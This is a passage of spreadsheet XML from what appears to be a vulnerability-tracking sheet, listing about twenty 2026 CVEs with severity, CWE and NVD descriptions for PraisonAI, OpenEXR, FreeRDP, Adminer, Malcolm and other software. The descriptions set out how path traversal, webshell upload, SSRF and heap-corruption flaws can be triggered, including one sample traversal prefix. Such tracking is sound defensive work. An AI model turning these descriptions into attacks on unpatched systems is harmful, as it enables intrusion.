          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, the FileMemory constructor joins unsanitized user_id into self.user_path. A caller supplying ../ or path separators can escape the memory directory and write JSON data to arbitrary process-writable locations. The fix sanitizes user_id before constructing self.user_path. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="M3133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55527</t>
        </is>
      </c>
    </row>
    <row r="3134">
      <c r="A3134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55537</t>
        </is>
      </c>
      <c r="C3134" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3134" s="5" t="inlineStr"/>
      <c r="F3134" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3134" s="5" t="inlineStr"/>
      <c r="H3134" s="5" t="inlineStr"/>
      <c r="I3134" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3134" s="5" t="inlineStr"/>
      <c r="K3134" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-705, CWE-918</t>
        </is>
      </c>
      <c r="L3134" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, JobSubmitRequest.validate_webhook_url() accepts webhook_url when resolution raises socket.gaierror because the exception path uses except socket.gaierror: pass. JobExecutor._send_webhook() later performs a fresh lookup, allowing DNS changes to direct the request to an internal service. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M3134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55537</t>
        </is>
      </c>
    </row>
    <row r="3135">
      <c r="A3135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55540</t>
        </is>
      </c>
      <c r="C3135" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3135" s="5" t="inlineStr"/>
      <c r="F3135" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3135" s="5" t="inlineStr"/>
      <c r="H3135" s="5" t="inlineStr"/>
      <c r="I3135" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3135" s="5" t="inlineStr"/>
      <c r="K3135" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3135" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.51, is_path_within_directory() uses os.path.abspath() rather than os.path.realpath() for the workspace boundary. A symlink inside workspace can point outside and still pass the check, allowing read_file and other code tools to access files outside the configured workspace. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M3135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55540</t>
        </is>
      </c>
    </row>
    <row r="3136">
      <c r="A3136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55609</t>
        </is>
      </c>
      <c r="C3136" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3136" s="5" t="inlineStr"/>
      <c r="F3136" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3136" s="5" t="inlineStr"/>
      <c r="H3136" s="5" t="inlineStr"/>
      <c r="I3136" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3136" s="5" t="inlineStr"/>
      <c r="K3136" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3136" s="5" t="inlineStr">
        <is>
          <t>sublinear-time-solver is a Rust and WebAssembly library for solving asymmetric diagonally dominant systems in sublinear time. Prior to consciousness-explorer 1.1.2 and sublinear-time-solver 1.6.0, the export_state and import_state tools in src/consciousness-explorer/mcp/server.js pass the attacker-controlled filepath parameter to filesystem operations in src/consciousness-explorer/index.js without restricting the destination or rejecting traversal. The saveVectorToFile and loadVectorFromFile tools in src/mcp/server.ts contain the same sink class through the file_path parameter. An attacker able to invoke the MCP tools can read, write, or overwrite any file accessible to the server process, causing confidentiality and integrity loss and possible service disruption. This issue is fixed in consciousness-explorer 1.1.2 and sublinear-time-solver 1.6.0.</t>
        </is>
      </c>
      <c r="M3136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55609</t>
        </is>
      </c>
    </row>
    <row r="3137">
      <c r="A3137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55673</t>
        </is>
      </c>
      <c r="C3137" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3137" s="5" t="inlineStr"/>
      <c r="F3137" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3137" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3137" s="5" t="inlineStr"/>
      <c r="I3137" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3137" s="5" t="inlineStr"/>
      <c r="K3137" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="L3137" s="5" t="inlineStr">
        <is>
          <t>PowSyBl (Power System Blocks) is a framework to build power system oriented software. Prior to 7.2.2, UnixLocalCommandExecutor and WindowsLocalCommandExecutor concatenate command arguments and environment variables into strings interpreted through bash -c or cmd /c without sufficient escaping. Attacker-controlled values reaching UnixLocalCommandExecutor.execute, WindowsLocalCommandExecutor.execute, LocalComputationManager.execute, ParallelLoadFlowActionSimulator.run, ActionSimulatorTool.run, AmplModelRunner.run, or AmplModelRunner.runAsync can break out of the intended command and execute arbitrary shell commands as the JVM user. The affected itools paths include action-simulator with task-count, security-analysis with external, and dynamic-security-analysis. Downstream CLI tools, libraries, REST front ends, and multi-tenant grid-analysis services that forward less-trusted contingency identifiers or computation parameters into these APIs can expose the injection remotely. This issue is fixed in version 7.2.2.</t>
        </is>
      </c>
      <c r="M3137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55673</t>
        </is>
      </c>
    </row>
    <row r="3138">
      <c r="A3138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55694</t>
        </is>
      </c>
      <c r="C3138" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3138" s="5" t="inlineStr"/>
      <c r="F3138" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3138" s="5" t="inlineStr"/>
      <c r="H3138" s="5" t="inlineStr"/>
      <c r="I3138" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3138" s="5" t="inlineStr"/>
      <c r="K3138" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3138" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset/license management system. Prior to 8.6.3, a restricted user can request /api/v1/users/{target_id}/eulas to obtain another user's randomized EULA filename and then download the signed file through /account/stored-eula-file/{filename}. The primary /stored-eula-file/{filename} route correctly denies access, but app/Http/Controllers/ProfileController.php and app/Http/Controllers/Api/UsersController.php do not consistently enforce ownership and target-user authorization. This issue is fixed in version 8.6.3.</t>
        </is>
      </c>
      <c r="M3138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55694</t>
        </is>
      </c>
    </row>
    <row r="3139">
      <c r="A3139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56702</t>
        </is>
      </c>
      <c r="C3139" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3139" s="5" t="inlineStr"/>
      <c r="F3139" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3139" s="5" t="inlineStr"/>
      <c r="H3139" s="5" t="inlineStr"/>
      <c r="I3139" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3139" s="5" t="inlineStr"/>
      <c r="K3139" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L3139" s="5" t="inlineStr">
        <is>
          <t>Adminer versions before 5.4.3 contain an unrestricted file upload vulnerability in the AdminerFileUpload plugin that allows authenticated users to upload PHP files by exploiting a permissive default extension allowlist. Attackers can upload PHP webshells to columns ending in _path and execute arbitrary code as the web-server user when uploadPath is web-served.</t>
        </is>
      </c>
      <c r="M3139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56702</t>
        </is>
      </c>
    </row>
    <row r="3140">
      <c r="A3140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58262</t>
        </is>
      </c>
      <c r="C3140" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3140" s="5" t="inlineStr"/>
      <c r="F3140" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3140" s="5" t="inlineStr"/>
      <c r="H3140" s="5" t="inlineStr"/>
      <c r="I3140" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3140" s="5" t="inlineStr"/>
      <c r="K3140" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347</t>
        </is>
      </c>
      <c r="L3140" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.20, header signature verification counts the unused padding bits of the PubKeysBitmap toward the two-thirds validator quorum. These padding bits do not correspond to any validator and are ignored by the actual BLS aggregate-signature check, so a malicious or compromised block producer can set them to reach the required quorum while gathering fewer genuine validator signatures than the protocol demands. As a result, nodes that import or intercept the header accept it as correctly signed without a real two-thirds quorum, weakening consensus safety and undermining finality. This issue is fixed in version 1.7.20.</t>
        </is>
      </c>
      <c r="M3140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58262</t>
        </is>
      </c>
    </row>
    <row r="3141">
      <c r="A3141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59184</t>
        </is>
      </c>
      <c r="C3141" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3141" s="5" t="inlineStr"/>
      <c r="F3141" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3141" s="5" t="inlineStr"/>
      <c r="H3141" s="5" t="inlineStr"/>
      <c r="I3141" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3141" s="5" t="inlineStr"/>
      <c r="K3141" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-787</t>
        </is>
      </c>
      <c r="L3141" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. Versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 allow a crafted EXR with a nonzero dataWindow.min to make TypedFlatImageChannel::row() return an invalid heap pointer, causing out-of-bounds or use-after-free writes. This occurs when an application writes rows through FlatHalfChannel::row(). Affected consumers are tools, converters, render pipeline components, or image-processing services that accept untrusted EXR files and use FlatHalfChannel::row() on loaded images. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="M3141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59184</t>
        </is>
      </c>
    </row>
    <row r="3142">
      <c r="A3142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59186</t>
        </is>
      </c>
      <c r="C3142" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3142" s="5" t="inlineStr"/>
      <c r="F3142" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3142" s="5" t="inlineStr"/>
      <c r="H3142" s="5" t="inlineStr"/>
      <c r="I3142" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3142" s="5" t="inlineStr"/>
      <c r="K3142" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="L3142" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13, a crafted tiled EXR can trigger a heap out-of-bounds write on 32-bit/ILP32 builds when read through the public TiledRgbaInputFile RGBA API. The file uses a small 40x40 dataWindow but a 65537x65537 tile size. On ILP32, the Array2D&lt;Rgba&gt; tile-conversion buffer size calculation overflows, allocates a much smaller heap buffer, and tile decode writes past that allocation. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="M3142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59186</t>
        </is>
      </c>
    </row>
    <row r="3143">
      <c r="A3143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59187</t>
        </is>
      </c>
      <c r="C3143" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3143" s="5" t="inlineStr"/>
      <c r="F3143" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3143" s="5" t="inlineStr"/>
      <c r="H3143" s="5" t="inlineStr"/>
      <c r="I3143" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3143" s="5" t="inlineStr"/>
      <c r="K3143" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L3143" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.13 are vulnerable to a heap out-of-bounds write when exrmetrics reads a crafted deep scanline EXR. This occurs with pixel conversion options such as --pixelmode float or --bench because DeepSlice requests FLOAT output while the backing sample buffers are allocated using the input HALF element size. The issue is fixed in versions 3.3.13 and 3.4.14.</t>
        </is>
      </c>
      <c r="M3143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59187</t>
        </is>
      </c>
    </row>
    <row r="3144">
      <c r="A3144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59189</t>
        </is>
      </c>
      <c r="C3144" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3144" s="5" t="inlineStr"/>
      <c r="F3144" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3144" s="5" t="inlineStr"/>
      <c r="H3144" s="5" t="inlineStr"/>
      <c r="I3144" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3144" s="5" t="inlineStr"/>
      <c r="K3144" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3144" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In OpenEXRUtil versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.12, the documented TypedDeepImageChannel&lt;T&gt;::row() API can return an out-of-bounds pointer when a deep image has a non-zero dataWindow origin, resulting in a heap out-of-bounds read and crash, with potential information disclosure under a controlled heap layout. The flaw arises because ImfDeepImageChannel uses two conflicting coordinate models: at(x, y) uses absolute coordinates (with _base offset by dataWindow.min), while row(r) is documented as 0-based logical access. For a non-zero dataWindow.min, row(0) therefore points outside the _sampleListPointers allocation instead of at the first logical row. This issue is fixed in versions 3.3.13 and 3.4.13.</t>
        </is>
      </c>
      <c r="M3144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59189</t>
        </is>
      </c>
    </row>
    <row r="3145">
      <c r="A3145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59981</t>
        </is>
      </c>
      <c r="C3145" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3145" s="5" t="inlineStr"/>
      <c r="F3145" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3145" s="5" t="inlineStr"/>
      <c r="H3145" s="5" t="inlineStr"/>
      <c r="I3145" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3145" s="5" t="inlineStr"/>
      <c r="K3145" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3145" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image file format, widely used in the motion picture industry. In versions through 3.2.10, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13, the OpenEXRUtil library returns an out-of-bounds pointer from the SampleCountChannel::row() API when a deep image has a non-zero dataWindow origin. The row() accessor is documented as 0-based and computes its address from an internal base that is offset for absolute pixel coordinates, so the two coordinate models conflict whenever dataWindow.min is non-zero. For a deep image whose data window has a large negative vertical origin, row(0) points far outside the allocated sample-count buffer. An application that opens an attacker-controlled deep EXR file and accesses sample counts through row() performs an out-of-bounds read, which can crash the process or, under a controlled heap layout, return adjacent heap memory as sample-count values. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="M3145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59981</t>
        </is>
      </c>
    </row>
    <row r="3146">
      <c r="A3146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59982</t>
        </is>
      </c>
      <c r="C3146" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3146" s="5" t="inlineStr"/>
      <c r="F3146" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3146" s="5" t="inlineStr"/>
      <c r="H3146" s="5" t="inlineStr"/>
      <c r="I3146" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3146" s="5" t="inlineStr"/>
      <c r="K3146" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="L3146" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 can return an out-of-bounds pointer from TypedDeepImageChannel::row() when a crafted deep EXR has a nonzero dataWindow origin. This vulnerability occurs because the API combines zero-based row access with an absolute-coordinate-adjusted base pointer, allowing a crash or limited information disclosure. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="M3146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59982</t>
        </is>
      </c>
    </row>
    <row r="3147">
      <c r="A3147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62315</t>
        </is>
      </c>
      <c r="C3147" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3147" s="5" t="inlineStr"/>
      <c r="F3147" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3147" s="5" t="inlineStr"/>
      <c r="H3147" s="5" t="inlineStr"/>
      <c r="I3147" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J3147" s="5" t="inlineStr"/>
      <c r="K3147" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="L3147" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. In version 16.31.0 and earlier, frappe.client.set_value in frappe/client.py checks a dictionary supplied through the fieldname parameter against forbidden standard and child-table fields before parsing the dictionary into individual field names. An authenticated caller can exploit this type confusion to mass-assign protected fields through the client endpoint. No released fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="M3147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62315</t>
        </is>
      </c>
    </row>
    <row r="3148">
      <c r="A3148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62680</t>
        </is>
      </c>
      <c r="C3148" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3148" s="5" t="inlineStr"/>
      <c r="F3148" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3148" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3148" s="5" t="inlineStr"/>
      <c r="I3148" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3148" s="5" t="inlineStr"/>
      <c r="K3148" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-829, CWE-918</t>
        </is>
      </c>
      <c r="L3148" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.22.0, Orval resolves remote and local external $ref values without an allowlist or confinement to the input directory. Processing an attacker-controlled OpenAPI description can cause requests from the developer or CI host to attacker-selected or internal HTTP services, read absolute or out-of-tree local files, and inline untrusted remote schemas into generated clients. The affected code is packages/orval/src/import-specs.ts external reference loading. This issue is fixed in version 8.22.0.</t>
        </is>
      </c>
      <c r="M3148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62680</t>
        </is>
      </c>
    </row>
    <row r="3149">
      <c r="A3149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63177</t>
        </is>
      </c>
      <c r="C3149" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3149" s="5" t="inlineStr"/>
      <c r="F3149" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3149" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="H3149" s="5" t="inlineStr"/>
      <c r="I3149" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3149" s="5" t="inlineStr"/>
      <c r="K3149" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3149" s="5" t="inlineStr">
        <is>
          <t>Malcolm is a network traffic analysis tool suite. Prior to version 26.07.0, role-based access control enforced in the Nginx OpenResty Lua layer evaluates the raw, unnormalized `ngx.var.request_uri`, while Nginx itself routes requests using the normalized path. An authenticated low-privilege user can prepend a traversal segment (for example `/x/../upload/...`) so that Nginx routes the request to a restricted backend while the Lua role check fails to match any rule and falls open, granting access it should deny. Version 26.07.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M3149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63177</t>
        </is>
      </c>
    </row>
    <row r="3150">
      <c r="A3150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63652</t>
        </is>
      </c>
      <c r="C3150" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3150" s="5" t="inlineStr"/>
      <c r="F3150" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3150" s="5" t="inlineStr"/>
      <c r="H3150" s="5" t="inlineStr"/>
      <c r="I3150" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3150" s="5" t="inlineStr"/>
      <c r="K3150" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3150" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.28.0, rdpsnd_server_recv_formats in channels/rdpsnd/server/rdpsnd_main.c frees context-&gt;client_formats on a malformed Client Audio Formats PDU without clearing the owning pointer or num_client_formats. An authenticated RDP client can trigger an error such as a cbSize larger than the remaining record, leave the dangling pointer in the server context, and cause rdpsnd_server_context_free to free the same allocation again at session teardown. This reliably terminates the server and can create allocator-dependent heap corruption. This issue is fixed in version 3.28.0.</t>
        </is>
      </c>
      <c r="M3150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63652</t>
        </is>
      </c>
    </row>
    <row r="3151">
      <c r="A3151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64379</t>
        </is>
      </c>
      <c r="C3151" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3151" s="5" t="inlineStr"/>
      <c r="F3151" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3151" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H3151" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I3151" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J3151" s="5" t="inlineStr"/>
      <c r="K3151" s="5" t="inlineStr"/>
      <c r="L3151" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: mask server-provided mode to 07777 in modefromsid
When modefromsid is active, parse_dacl() applies the server-provided
sub_auth[2] value from the NFS mode SID to cf_mode without masking to
07777. Apply the correct masking, same as in the read path.</t>
        </is>
      </c>
      <c r="M3151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64379</t>
        </is>
      </c>
    </row>
    <row r="3152">
      <c r="A3152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64816</t>
        </is>
      </c>
      <c r="C3152" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3152" s="5" t="inlineStr"/>
      <c r="F3152" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3152" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3152" s="5" t="inlineStr"/>
      <c r="I3152" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J3152" s="5" t="inlineStr"/>
      <c r="K3152" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3152" s="5" t="inlineStr">
        <is>
